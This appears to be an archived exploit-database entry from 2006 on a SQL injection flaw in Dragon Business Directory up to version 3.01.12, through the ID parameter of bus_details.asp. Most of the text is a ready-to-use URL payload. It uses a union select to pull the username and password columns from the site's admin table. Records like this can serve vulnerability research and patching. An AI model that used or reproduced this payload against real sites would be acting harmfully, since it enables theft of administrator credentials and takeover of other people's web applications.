id: 1300
date: 12/23/2006
title: Dragon Business Directory <= 3.01.12 (ID) SQL Injection Vulnerability
author: ajann
cves: 

=====================================================================
Dragon Business Directory <= 3.01.12 (ID) SQL Injection Vulnerability
=====================================================================



*******************************************************************************
# Title   :  Dragon Business Directory <= V3.01.12 (ID) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.enthrallweb.us
# $$      :  179.40  USD

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//bus_details.asp?ID=[SQL]

Example:

//bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin


[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...




#  0day.today [2023-03-27]  #